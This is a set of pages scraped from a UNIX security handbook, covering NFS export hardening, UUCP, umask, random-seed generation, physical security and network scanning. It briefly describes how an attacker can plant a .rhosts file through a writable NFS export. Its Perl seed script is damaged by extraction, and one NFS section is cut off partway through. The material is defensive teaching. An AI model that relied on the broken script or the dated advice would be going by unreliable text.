computer on the network that wishes to mount it; if the computer is on the <strong>Internet</strong>, then any other computer on the <strong>Internet</strong> has<br />

access to this server's /tftpboot directory.<br />

What's the harm? First of all, users of the /tftpboot directory may not be aware that files that they place in it can be so widely<br />

accessed. Another problem arises if the directory can be written: in this case, there is a possibility that the storage space will be<br />

hijacked by software pirates and used as a software pirate "warez" repository. Perhaps worse, the software on that partition can be<br />

replaced with hacked versions that may not perform as the real owners would wish! (In this case, /tftpboot is probably used for<br />

providing bootstrap code to machines on the network. By modifying this code, a resourceful attacker could force arbitrary computers<br />

to run password sniffers, erase their hard drives, or do other unwanted things.)<br />

The last two lines of the sample configuration file have a similar problem: they export the directories /usr/lib/X11/ncd and<br />

/usr/openwin freely over the network. Although the directories are exported read only, there is still a chance that a software pirate<br />

could use the exported filesystems to obtain copies of copyrighted software. This scenario could create a legal liability for the site<br />

running the NFS server.<br />

You can make your server more secure by only exporting filesystems to the particular computers that need to use those filesystems.<br />

Don't export filesystems that don't have to be exported. And don't export filesystems to the entire <strong>Internet</strong> - otherwise you will only<br />

be asking for trouble.<br />

Here is a revised dfstab file that is properly configured:<br />

# place share(1M) commands here for automatic execution<br />

# on entering init state 3.<br />

#<br />

# This configuration is more secure.<br />

#<br />

share -F nfs -o rw=red:blue:green /cpg<br />

share -F nfs -o rw=clients -d "spool" /var/spool<br />

share -F nfs -o ro=clients /tftpboot<br />

share -F nfs -o ro=clients /usr/lib/X11/ncd<br />

share -F nfs -o ro=clients /usr/openwin<br />

NOTE: Be aware that the options on export commands and configuration files have different semantics under SVR4<br />

and earlier, BSD-like systems (including SunOS). Under earlier BSD-like systems, the -ro option does not take<br />

hostnames as parameters, and there is an -access option to limit access. If you specified an export list under SunOS such<br />

as in the above example:<br />

exportfs -i -o rw=clients /var/spool<br />

then the directory is exported read/write to the members of the clients netgroup, but it is also exported read-only to<br />

everyone else on the network! You must also specify the -access option with the -rw option to limit the scope of the<br />

export. Thus, to prevent other machines from reading exported files, you must use the following command:<br />

exportfs -i -o rw=clients,access=clients /var/spool<br />

Under SVR4, both the -rw and -ro options can take a host list to restrict the export of the files. The directory is exported<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_04.htm (2 of 6) [2002-04-12 10:45:41]


[Chapter 20] 20.4 Improving NFS <strong>Sec</strong>urity<br />

only to the hosts named in the union of the two lists. There is no -access option in SVR4.<br />

20.4.2 Export Read-only<br />

Many filesystems contain information that is only read, never (or rarely) written. These filesystems can be exported read-only.<br />

Exporting the filesystems read-only adds to both security and reliability: it prevents the filesystems from being modified by NFS<br />

clients, limiting the damage that can be done by attackers, ignorant users, and buggy software.<br />

Many kinds of filesystems are candidates for read-only export:<br />

●<br />

●<br />

●<br />

Filesystems containing applications<br />

Organizational reference matter, such as policies and documents<br />

Netnews (if you do not read news with NNTP)<br />

If you have programs or other files that must be exported read-write, you can improve your system's overall performance, reliability,<br />

and security by placing these items on their own filesystem that is separately exported.<br />

To export a filesystem read-only, specify the ro=clients option in either your exports file or your dfstab file (depending on which<br />

version of <strong>UNIX</strong> you are using). In the following example, the /LocalLibrary directory is exported read-only:<br />

share -F nfs -o ro=clients /LocalLibrary<br />

20.4.3 Use Root Ownership<br />

Because the NFS server maps root to nobody, you can protect files and directories on your server by setting their owner to root and<br />

their protection mode to 755 (in the case of programs and directories) or 644 (in the case of data files). This setup will prevent the<br />

contents of the files from being modified by a client machine.<br />

If you have information on an NFS server that should not be accessible to NFS clients, you can use the file protection mode 700 (in<br />

the case of programs and directories) or 600 (in the case of data files). However, a better strategy is not to place the files on the NFS<br />

server in the first place.<br />

Remember, this system protects only files on the server that are owned by root. Also, this technique does not work if you have<br />

patched your kernel to set the value of nobody to 0, or if you export the filesystems to a particular host with the -root= option.<br />

NOTE: Protecting an executable file to be execute-only will not work as you expect in an NFS environment. Because<br />

you must read a file into memory before it can be executed, any file marked executable can also be read from a server<br />

using NFS commands (although it may not be possible to do so using standard calls through a client). The server has no<br />

way of knowing if the requests to be read are a prelude to execution or not. Thus, putting execute-only files on an<br />

exported partition may allow them to be examined or copied from a client machine.<br />

20.4.4 Remove Group-write Permission for Files and Directories<br />

If you are using standard AUTH_<strong>UNIX</strong> authentication with NFS, then users can effectively place themselves in any group. Thus, to<br />

protect files and directories that are owned by root, they must not be group-writable.<br />

20.4.5 Do Not Export Server Executables<br />

If your server is running the same operating system on the same CPU architecture as your client computers, then you might be<br />

tempted to have the server export its own executables (such as the programs stored in /bin, /usr/bin, /etc.) for use by the clients. Don't<br />

do so without careful thought about the consequences.<br />

At first, exporting a server's own executables seems like a good way to save disk space: this way, you only need to have one copy of<br />

each program, which is then shared between the clients and the servers, rather than two copies.<br />

But exporting your server's executables poses several security problems:<br />

●<br />

●<br />

It allows an attacker to easily determine which version of each executable your server is running, which enables the attacker to<br />

probe for weak spots with greater ease.<br />

If there is an error in your system's configuration, you may be exporting the binaries on a writable filesystem. An attacker<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_04.htm (3 of 6) [2002-04-12 10:45:41]


[Chapter 20] 20.4 Improving NFS <strong>Sec</strong>urity<br />

could then modify the server's own binaries, and possibly break in (or at least cause you serious problems).<br />

You can minimize the need for exporting server binaries by using the dataless client configuration that is available on some versions<br />

of <strong>UNIX</strong>. In this case, "dataless" means that each client computer maintains a complete copy of all of its executable files, but stores<br />

all of its data that is subject to change on a central server.<br />

If you simply must export the server's binaries, then export the filesystem read-only.<br />

20.4.6 Do Not Export Home Directories<br />

If you export a filesystem that has users' home directories on it and you do not use <strong>Sec</strong>ure RPC, then all other clients mounting that<br />

directory, as well as the server itself, can be placed at risk.<br />

If you export a filesystem that contains users' home directories, then there is a risk that an attacker could alter the information stored<br />

on the NFS server. This is normally a serious risk in itself. However, if the partition being exported includes users' home directories,<br />

then one of the things that an attacker can do is create files in the users' home directories.<br />

A simple attack is for an attacker to create a .rhosts file in a users's home directory that specifically allows access to the attacker.<br />

Having created this file, the attacker could now log onto the server and proceed to look for additional security holes. Perhaps the<br />

greatest danger in this attack is that it can be aimed against system accounts (such as daemon and bin) as easily as accounts used by<br />

human users.<br />

Likewise, you should avoid exporting filesystems that contain world-writable directories (e.g., /tmp, /usr/tmp, /usr/spool/uucppublic).<br />

20.4.7 Do Not Allow Users to Log into the Server<br />

NFS and direct logins are two fundamentally different ways to use a computer. If you allow users to log into a server, the user can<br />

use that access to probe for weaknesses that can be exploited from NFS, and vice versa.<br />

20.4.8 Use fsirand<br />

One of the security problems with NFS is that the file handles used to reference a file consist solely of a filesystem ID, an inode<br />

number, and a generation count. Guessing valid file handles is easy in most circumstances. Filesystem IDs are normally small<br />

numbers; the root directory on the standard <strong>UNIX</strong> filesystem has the inode number 2, /lost+found has the inode number 3, and so on.<br />

The only difficulty in guessing a file handle is the generation count. For many important inodes, including the root inode, we would<br />

expect the generation count to be very small - we don't normally delete a filesystem's root entry!<br />

The fsirand program increases the difficulty of guessing a valid file handle by randomizing the generation number of every inode on<br />

a filesystem. The effect is transparent to the user - files and directories are still fetched as appropriate when a reference is made - but<br />

someone on the outside is unable to guess file handles for files and directories anymore.<br />

You can run fsirand on the root directory while in single-user mode or on any unmounted filesystem that will fsck without error.<br />

For example, to run fsirand on your /dev/sd1a partition, type the following:<br />

# umount /dev/sd1a Unmount the filesystem<br />

# fsirand /dev/sd1a Run fsirand<br />

You might benefit from running fsirand once a month on your exported partitions. Some people run it automatically every time the<br />

system boots, but this has the disadvantage of making all legitimate file handles stale, too. Consider your environment before taking<br />

such a drastic step.<br />

The fsirand program is not available on all versions of <strong>UNIX</strong>. In particular, it is not available under Linux.<br />

NOTE: Older versions of Sun's fsirand contained buggy code that made the "random" values quite predictable. Be sure<br />

you have the latest version of fsirand from your vendor. Most newer versions of the newfs command automatically run<br />

fsirand, but not all do. The functionality of fsirand is incorporated into the Solaris 2.5 mkfs command.<br />

20.4.9 Set the portmon Variable<br />

Normally, NFS servers respond to requests that are transmitted from any UDP port. However, because NFS requests are supposed to<br />

come from kernels of other computers, and not from users who are running user-level programs on other computers, a simple way to<br />

improve the security of NFS servers is to program them to reject NFS requests that do not come from privileged ports. On many NFS<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_04.htm (4 of 6) [2002-04-12 10:45:41]


[Chapter 20] 20.4 Improving NFS <strong>Sec</strong>urity<br />

servers, the way that this restriction is established is by setting the kernel variable nfs_portmon to 1. It's important to do this if you<br />

want even a minimal amount of NFS security.[10]<br />

[10] The value of 1 is not the default because some vendors' NFS implementations don't send requests from ports


[Chapter 20] 20.4 Improving NFS <strong>Sec</strong>urity<br />

[12] We have seen several "NFS shells" that allow a user to make such accesses in a largely automated way.<br />

<strong>Sec</strong>ure NFS overcomes these problems by using AUTH_DES RPC authentication instead of AUTH_<strong>UNIX</strong>. With <strong>Sec</strong>ure NFS, users<br />

must be able to decrypt a special key stored on the NIS or NIS+ server before the NFS filesystem will allow the user to access his or<br />

her files.<br />

To specify <strong>Sec</strong>ure NFS, you must specify the secure option both on the NFS server (in the exports file or the dfstab) and on the client<br />

(in the /etc/fstab or /etc/vfstab file).<br />

NOTE: <strong>Sec</strong>ure NFS requires <strong>Sec</strong>ure RPC to function, and therefore may not be available on all versions of <strong>UNIX</strong>. If<br />

you are in doubt about your system, check your documentation to see if your NFS mount command supports the secure<br />

option. Also note that <strong>Sec</strong>ure RPC may not be available on non-<strong>UNIX</strong> implementations of NFS, either.<br />

Here is an example of using <strong>Sec</strong>ure NFS. Suppose that a server has a filesystem /Users that it will export using <strong>Sec</strong>ure NFS. The<br />

server's /etc/dfs/dfstab file might contain the following line:<br />

share -F nfs -o secure,rw=clients /Users<br />

Meanwhile, the clients /etc/vfstab file would have a matching line:<br />

#device device mount FS fsck mount mount<br />

#to moun to fsck pont type pass at boot options<br />

#<br />

server:/Users - /Users nfs - yes secure<br />

20.3 Client-Side NFS <strong>Sec</strong>urity 20.5 Some Last Comments<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_04.htm (6 of 6) [2002-04-12 10:45:41]


[Chapter 15] 15.8 UUCP Over Networks<br />

Chapter 15<br />

UUCP<br />

15.8 UUCP Over Networks<br />

Some versions of <strong>UNIX</strong>, starting in the late 1980s, allowed transfer of files over IP networks in addition<br />

to serial lines. This capability was intended as a convenience for sites that were migrating from primarily<br />

phone-based networking to IP-based networking that the sites could continue to use existing UUCP<br />

configurations. This upgrade was also intended as a stopgap for Usenet news delivery prior to the<br />

development of reliable NNTP-based systems.<br />

The way IP-based UUCP works is via a daemon program, usually named uucpd. A receiving host<br />

machine will either have a uucpd daemon always running, or it will run when an incoming connection is<br />

requested (see Chapter 17). The sending machine's uucico program will connect with the remote<br />

machine's uucpd program to transfer files. Instead of running login followed by uucico in Slave mode,<br />

the remote site uses uucpd.<br />

The key to keep in mind for security is that the uucp daemon should be disabled on your machine if you<br />

are not going to use it. Because you have no telephone lines, you might believe that you don't need to<br />

worry about the uucp installation. This is incorrect! If the daemon is enabled, the default uucp<br />

configuration files might be enough to allow an outsider to snatch copies of files, install altered<br />

commands, or fill up your disk.<br />

If you are not using UUCP over networks, be sure that this aspect is disabled. And if you are not going to<br />

be using UUCP at all, we suggest you delete UUCP and its associated files from your system to prevent<br />

any accidents that might enable it or allow it to be used against your system.<br />

NOTE: If you have UUCP enabled on a machine with an FTP server, be sure to add all your<br />

UUCP accounts to the /etc/ftpusers file. Otherwise, anyone who obtains a UUCP account<br />

password will be able to use your ftp service to transfer any files accessible to UUCP into or<br />

out of your filesystem (including UUCP control files and binaries - which could<br />

compromise your system).<br />

15.7 Early <strong>Sec</strong>urity Problems<br />

with UUCP<br />

15.9 Summary<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_08.htm [2002-04-12 10:45:41]


[Chapter 23] 23.6 Tips on Generating Random Numbers<br />

Chapter 23<br />

Writing <strong>Sec</strong>ure SUID and<br />

Network Programs<br />

23.6 Tips on Generating Random Numbers<br />

Random numbers play an important role in modern computer security. Many programs that use<br />

encryption need a good source of random numbers for producing session keys. For example, the PGP<br />

program uses random numbers for generating a random key which is used to encrypt the contents of<br />

electronic mail messages; the random key is then itself encrypted using the recipient's public key.<br />

Random numbers have other uses in computer security as well. A variety of authentication protocols<br />

require that the computer create a random number, encrypt it, and send it to the user. The user must then<br />

decrypt the number, perform a mathematical operation on it, re-encrypt the number, and send it back to<br />

the computer.<br />

A great deal is known about random numbers. Here are some general rules of thumb:<br />

1.<br />

2.<br />

3.<br />

If a number is random, then each bit of that number should have an equal probability of being a 0<br />

or a 1.<br />

If a number is random, then after each 0 in that number there should be an equal proba- bility that<br />

the following bit is a 0 or a 1. Likewise, after each 1 there should be an equal probability that the<br />

following bit is a 0 or a 1.<br />

If the number has a large number of bits, then roughly half of the number's bits should be 0s, and<br />

half of the bits should be 1s.<br />

For security-related purposes, a further requirement for random numbers is unpredictability:<br />

1.<br />

2.<br />

3.<br />

It should not be possible to predict the output of the random number generator given previous<br />

outputs or other knowledge about the computer generating the random numbers.<br />

It should not be possible to determine the internal state of the random number generator.<br />

It should not be possible to replicate the initial state of the random number generator, or to reseed<br />

the generator with the same initial value.<br />

One of the best ways of generating a stream of random numbers is to make use of a random process, such<br />

as radioactive decay. Unfortunately, most <strong>UNIX</strong> computers are not equipped with Geiger counters. Thus,<br />

they need to use something else. Often, they use pseudorandom functions as random number generators.<br />

A pseudorandom function is a function that yields a series of outputs which appears to be unpredictable.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_06.htm (1 of 2) [2002-04-12 10:45:42]


[Chapter 23] 23.6 Tips on Generating Random Numbers<br />

In practice, these functions maintain a large internal state from which the output is calculated. Each time<br />

a new number is generated, the internal state is changed. The function's initial state is referred to as its<br />

seed.<br />

If you need a series of random numbers that is repeatable, you need a pseudorandom generator that takes<br />

a seed and keeps an internal state. If you need a non-reproducible series of random numbers, you should<br />

avoid pseudo- random generators. Thus, successfully picking random numbers in the <strong>UNIX</strong> environment<br />

depends on two things: picking the right random number generator, and then picking a different seed<br />

each time the program is run.<br />

23.5 Tips on Using Passwords 23.7 <strong>UNIX</strong> Pseudo-Random<br />

Functions<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_06.htm (2 of 2) [2002-04-12 10:45:42]


[Chapter 5] 5.3 The umask<br />

5.3 The umask<br />

Chapter 5<br />

The <strong>UNIX</strong> Filesystem<br />

The umask (<strong>UNIX</strong> shorthand for "user file-creation mode mask") is a four-digit octal number that <strong>UNIX</strong><br />

uses to determine the file permission for newly created files. Every process has its own umask, inherited<br />

from its parent process.<br />

The umask specifies the permissions you do not want given by default to newly created files and<br />

directories. umask works by doing a bitwise AND with the bitwise complement of the umask. Bits that<br />

are set in the umask correspond to permissions that are not automatically assigned to newly created files.<br />

By default, most <strong>UNIX</strong> versions specify an octal mode of 666 (any user can read or write the file) when<br />

they create new files.[20] Likewise, new programs are created with a mode of 777 (any user can read,<br />

write, or execute the program). Inside the kernel, the mode specified in the open call is masked with the<br />

value specified by the umask - thus its name.<br />

[20] We don't believe there is any religious significance to this, although we do believe that<br />

making files readable and writable by everyone leads to many evil deeds.<br />

Normally, you or your system administrator set the umask in your .login, .cshrc, or .profile files, or in the<br />

system /etc/profile file. For example, you may have a line that looks like this in one of your startup files:<br />

# Set the user's umask umask 033<br />

When the umask is set in this manner, it should be set as one of the first commands. Anything executed<br />

prior to the umask command will have its prior, possibly unsafe, value.<br />

Under SVR4 you can specify a default umask value in the /etc/defaults/login file. This umask is then<br />

given to every user that executes the login program. This method is a much better (and more reliable)<br />

means of setting the value for every user than setting the umask in the shell's startup files.<br />

5.3.1 The umask Command<br />

An interface to the umask function is a built-in command in the sh, ksh, and csh shell programs. (If<br />

umask were a separate program, then typing umask wouldn't change the umask value for the shell's<br />

process! See Appendix C if you are unsure why this scenario is so.) A umask ( ) system call for programs<br />

that wish to further change their umask also exists.<br />

The most common umask values are 022, 027, and 077. A umask value of 022 lets the owner both read<br />

and write all newly created files, but everybody else can only read them:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_03.htm (1 of 3) [2002-04-12 10:45:42]


[Chapter 5] 5.3 The umask<br />

0666 default file-creation mode<br />

(0022) umask<br />

0644 resultant mode<br />

A umask value of 077 lets only the file's owner read all newly created files:<br />

0666 default file-creation mode<br />

(0077) umask<br />

0600 resultant mode<br />

A simple way to calculate umask values is to remember that the number 2 in the umask turns off write<br />

permission, while 7 turns off read, write, and execute permission.<br />

A umask value of 002 is commonly used by people who are working on group projects. If you create a<br />

file with your umask set to 002, anyone in the file's group will be able to read or modify the file.<br />

Everybody else will only be allowed to read it:<br />

0666 default file-creation mode<br />

(0002) umask<br />

0664 resultant mode<br />

If you use the Korn shell, ksh, then you can set your umask symbolically. You do this with the same<br />

general syntax as the chmod command. In the ksh, the following two commands would be equivalent:<br />

% umask u=rwx,g=x,o=<br />

% umask 067<br />

5.3.2 Common umask Values<br />

On many <strong>UNIX</strong> systems, the default umask is 022. This is inherited from the init process, as all<br />

processes are descendants of init.[21] Some systems may be configured to use another umask value, or a<br />

different value may be set in the startup files.<br />

[21] See the discussion in Appendix C, to learn about init's role.<br />

The designers of these systems chose this umask value to foster sharing, an open computing<br />

environment, and cooperation among users. Most prototype user accounts shipped with <strong>UNIX</strong> operating<br />

systems specify 022 as the default umask, and many computer centers use this umask when they set up<br />

new accounts. Unfortunately, system administrators frequently do not make a point of explaining the<br />

umask to novice users, and many users are not aware that most of the files they create are readable by<br />

every other user on the system.<br />

A recent trend among computing centers has been to set up new accounts with a umask of 077, so a<br />

user's files will, by default, be unreadable by anyone else on the system unless the user makes a<br />

conscious choice to make them readable.<br />

Here are some common umask values and their effects:<br />

Table 5.10: Common umask Settings<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_03.htm (2 of 3) [2002-04-12 10:45:42]


[Chapter 5] 5.3 The umask<br />

umask User Access Group Access Other<br />

0000 all all all<br />

0002 all all read, execute<br />

0007 all all none<br />

0022 all read, execute read, execute<br />

0027 all read, execute none<br />

0077 all none none<br />

5.2 Using File Permissions 5.4 Using Directory<br />

Permissions<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_03.htm (3 of 3) [2002-04-12 10:45:42]


[Chapter 23] 23.9 A Good Random Seed Generator<br />

Chapter 23<br />

Writing <strong>Sec</strong>ure SUID and<br />

Network Programs<br />

23.9 A Good Random Seed Generator<br />

As we've mentioned, one way of generating a random seed is to use a source message digest algorithm such as MD5 or HAVAL.<br />

As input, give it as much data as you can based on temporary state. This data might include the output of ps - efl, the environment<br />

variables for the current process, its PID and PPID, the current time and date, the output of the random number generator given<br />

your seed, the seed itself, the state of network connections, and perhaps a directory listing of the current directory. The output of<br />

the function will be a string of bits that an attacker cannot likely duplicate, but which is likely to meet all the other conditions of<br />

randomness you might desire.<br />

The Perl program in Example 23.1 is an example of such a program. It uses several aspects of system state, network status, virtual<br />

memory statistics, and process state as input to MD5. These numbers change very quickly on most computers, and cannot be<br />

anticipated, even by programs running as supe- ruser on the same computer. The entropy (randomness) of these values is spread<br />

throughout the result by the hashing function of MD5, resulting in an output that should be sufficiently random for most uses.<br />

Note that this script is an excellent method for generating Xauthority keys (see "X security" in Chapter 17), if you need them.<br />

Simply execute it with an argument of 14 (you need 28 hex characters of key) and use the result as your key.<br />

Example 23.1: Generating a Random Seed String<br />

#!/usr/bin/perl<br />

#<br />

# randbits -- Gene Spafford <br />

# generate a random seed string based on state of system<br />

#<br />

# Inspired by a program from Bennett Todd (bet@std.sbi.com), derived<br />

# from original by Larry Wall.<br />

#<br />

# Uses state of various kernel structures as random "seed"<br />

# Mashes them together and uses MD5 to spread around<br />

#<br />

# Usage: randbits [-n] [-h | -H ] [keylen]<br />

# Where<br />

# -n means to emit no trailing linefeed<br />

# -h means to give output in hex (default)<br />

# -H means hex output, but use uppercase letters<br />

# keylen is the number of bytes to the random key (default is 8)<br />

# If you run this on a different kind of system, you will want to adjust the<br />

# setting in the "noise" string to system-specific strings. Do it as another<br />

# case in the "if...else" and e-mail me the modification so I can keep a<br />

# merged copy. (Hint: check in your manual for any programs with "stat" in<br />

# the name or description.)<br />

#<br />

# You will need to install a version of MD5. You can find one in the COAST<br />

# achive at ftp://coast.cs.purdue.edu/pub/tools/unix<br />

# Be sure to include its location in the PATH below if it isn't in one of the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_09.htm (1 of 3) [2002-04-12 10:45:43]


[Chapter 23] 23.9 A Good Random Seed Generator<br />

# directories already listed.<br />

$ENV{'PATH'} = "/bin:/usr/bin:/usr/etc:/usr/ucb:/etc:" . $ENV{'PATH'};<br />

# We start with the observation that most machines have either a BSD<br />

# core command set, or a System V-ish command set. We'll build from those.<br />

$BSD = "ps -agxlww ; netstat -s ; vmstat -s ;";<br />

$SYSV = "ps -eflj ; netstat -s ; nfsstat -nr ;";<br />

if ( -e "/sdmach" ) {<br />

$_ = "NeXT";<br />

} elsif ( -x "/usr/bin/uname" || -x "/bin/uname") {<br />

$_ = `uname -sr`;<br />

} elsif ( -x "/etc/version" ) {<br />

$_ = `/etc/version`;<br />

} else {<br />

die "How do I tell what OS this is?";<br />

}<br />

/^AIX 1/ && ( $noise = $BSD . 'pstat -afipSsT')||<br />

/^CLIX 3/ && ( $noise = "ps -efl ; nfsstat -nr")||<br />

/^DYNIX/ && ( $noise = $BSD . 'pstat -ai')||<br />

/^FreeBSD 2/ && ( $noise = $BSD . 'vmstat -i')||<br />

/^HP-UX 7/ && ( $noise = $SYSV)||<br />

/^HP-UX A.09/ && ( $noise = $SYSV . "vmstat -s")||<br />

/^IRIX(64)? [56]/ && ( $noise = $SYSV)||<br />

/^Linux 1/ && ( $noise = "ps -agxlww ; netstat -i ;<br />

vmstat")||<br />

/^NeXT/ && ( $noise = 'ps agxlww;netstat -s;vm_stat')||<br />

/^OSF1/ && ( $noise = $SYSV . 'vmstat -i')||<br />

/^SunOS 4/ && ( $noise = $BSD . 'pstat -afipSsT;vmstat<br />

-i')||<br />

/^SunOS 5/ && ( $noise = $SYSV . 'vmstat -i;vmstat -s')||<br />

/^ULTRIX 4/ && ( $noise = $BSD . 'vmstat -s')|||<br />

die "No 'noise' commands defined for this OS. Edit and retry!";<br />

#### End of things you may need to modify<br />

require 'getopts.pl';<br />

require 'open2.pl';<br />

($prog = $0) =~ s|.*/||;<br />

$usage = "usage: $prog [-n] [-h | -H] [keylength]\n";<br />

&Getopts('nhH') || die $usage;<br />

defined($keylen = shift) || ($keylen = 8);<br />

die $usage if ($keylen =~ /\D/);<br />

die $usage if ($opt_H && $opt_h);<br />

die "Maximum keylength is 16 bytes (32 hex digits)\n" if ($keylen > 16);<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_09.htm (2 of 3) [2002-04-12 10:45:43]


[Chapter 23] 23.9 A Good Random Seed Generator<br />

# Run the noise command and include whatever other state we<br />

# can conveniently (portably) find.<br />

@junk = times();<br />

$buf = `$noise` . $$ . getppid() . time . join(`', %ENV) . "@junk" . `ls -lai`;<br />

# Now, run it through the md5 program to mix bits and entropy<br />

&open2('m_out', 'm_in', "md5") || die "Cannot run md5 command: $!";<br />

print m_in $buf;<br />

close m_in;<br />

$buf = ;<br />

($buf =~ y/a-f/A-F/) if $opt_H;<br />

print substr($buf, 0, 2*$keylen);<br />

print "\n" unless $opt_n;<br />

23.8 Picking a Random Seed VI. Handling <strong>Sec</strong>urity<br />

Incidents<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_09.htm (3 of 3) [2002-04-12 10:45:43]


[Chapter 12] Physical <strong>Sec</strong>urity<br />

Chapter 12<br />

12. Physical <strong>Sec</strong>urity<br />

Contents:<br />

One Forgotten Threat<br />

Protecting Computer Hardware<br />

Protecting Data<br />

Story: A Failed Site Inspection<br />

"Physical security" is almost everything that happens before you (or an attacker) start typing commands<br />

on the keyboard. It's the alarm system that calls the police department when a late-night thief tries to<br />

break into your building. It's the key lock on the computer's power supply that makes it harder for<br />

unauthorized people to turn the machine off. And it's the surge protector that keeps a computer from<br />

being damaged by power surges.<br />

This chapter discusses basic physical security approaches. It's designed for people who think that this<br />

form of security is of no concern. Unfortunately, physical security is an oft-overlooked aspect of security<br />

that is very important. You may have the best encryption and security tools in place, and your <strong>UNIX</strong><br />

systems may be safely hidden behind a firewall. However, if you cheerfully hire an industrial spy as your<br />

system administrator, and she walks off with your disk drives, those other fancy defenses aren't much<br />

help.<br />

12.1 One Forgotten Threat<br />

Surprisingly, many organizations do not consider physical security to be of the utmost concern. One New<br />

York investment house was spending tens of thousands of dollars on computer security measures to<br />

prevent break-ins during the day, only to discover that its cleaning staff was propping open the doors to<br />

the computer room at night while the floor was being mopped. In the late 1980s, a magazine in San<br />

Francisco had more than $100,000 worth of computers stolen over a holiday: an employee had used his<br />

electronic key card to unlock the building and disarm the alarm system; after getting inside, the person<br />

went to the supply closet where the alarm system was located and removed paper from the alarm<br />

system's log printer.<br />

Physical security is one of the most frequently forgotten forms of security because the issues that<br />

physical security encompasses - the threats, practices, and protections available - are different for<br />

practically every different site. Physical security resists simple treatment in books on computer security,<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_01.htm (1 of 3) [2002-04-12 10:45:43]


[Chapter 12] Physical <strong>Sec</strong>urity<br />

as different organizations running the identical system software might have dramatically different<br />

physical-security needs. (Many popular books on <strong>UNIX</strong> system security do not even mention physical<br />

security.) Because physical security must inherently be installed on-site, it cannot be pre-installed by the<br />

operating system vendor, sold by telemarketers, or FTP'ed over the <strong>Internet</strong> as part of a free set of<br />

security tools.<br />

Anything that we can write about physical security must therefore be broadly stated and general. Because<br />

every site is different, this chapter can't give you a set of specific recommendations. It can only give you<br />

a starting point, a list of issues to consider, and a procedure for formulating your plan.<br />

12.1.1 The Physical <strong>Sec</strong>urity Plan<br />

The first step to physically securing your installation is to formulate a written plan addressing your<br />

current physical security needs and your intended future direction - something we discussed in Chapter 2,<br />

Policies and Guidelines. Ideally, such a plan should be part of the site security policy, and should<br />

include:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Description of the physical assets that you are protecting<br />

Description of the physical area where the assets are located<br />

Description of your security perimeter (the boundary between the rest of the world and your<br />

secured area), and the holes in the perimeter<br />

Threats you are protecting against<br />

Your security defenses, and ways of improving them<br />

Estimated cost of any improvements, the cost of the information that you are protecting, and the<br />

likelihood of an attack, accident, or disaster<br />

If you are managing a particularly critical installation, you should take great care in formulating this plan.<br />

Have it reviewed by an outside firm that specializes in disaster recovery planning and risk assessment.<br />

You should also consider your security plan a sensitive document: by its very nature, it contains detailed<br />

information on your defenses' weakest points.<br />

Smaller businesses, many educational institutions, and home systems will usually not need anything so<br />

formal; some preparation and common sense is all that is usually necessary, although even a day of a<br />

consultant's time may be money well spent.<br />

Some organizations may consider that many of the ideas described in the following sections are overkill.<br />

Before you come to this conclusion, ask yourself five questions:<br />

1.<br />

2.<br />

3.<br />

Does anybody other than you have physical access to your computer?<br />

What would happen if that person had a breakdown or an angry outburst, and tried to smash your<br />

system with a hammer?<br />

What would happen if someone in the employ of your biggest competitor were to come into the<br />

building unnoticed?<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_01.htm (2 of 3) [2002-04-12 10:45:43]


[Chapter 12] Physical <strong>Sec</strong>urity<br />

4.<br />

5.<br />

In the event of some large disaster in the building, would you lose the use of your computer?<br />

If some disaster were to befall your system, how would you face all your angry users?<br />

11.6 Protecting Your System 12.2 Protecting Computer<br />

Hardware<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_01.htm (3 of 3) [2002-04-12 10:45:43]


[Chapter 17] 17.6 Network Scanning<br />

Chapter 17<br />

TCP/IP Services<br />

17.6 Network Scanning<br />

In recent years, a growing number of programs have been distributed that you can use to scan your<br />

network for known problems. Unfortunately, attackers can also use these tools to scan your network for<br />

vulnerabilities. Thus, you would be wise to get one or more of these tools and try them yourself, before<br />

your opponents do. See Appendix E, Electronic Resources, for information about obtaining these tools.<br />

17.6.1 SATAN<br />

SATAN is a package of programs written by Dan Farmer and Wietse Venema, two well-known security<br />

experts. The package probes hosts on a network for a variety of well-known security flaws. The results of<br />

the scan and the interface to the programs are presented in HTML and may be viewed using a WWW<br />

browser.<br />

SATAN is large, and has a "footprint" that is relatively easy to detect. Several programs have been<br />

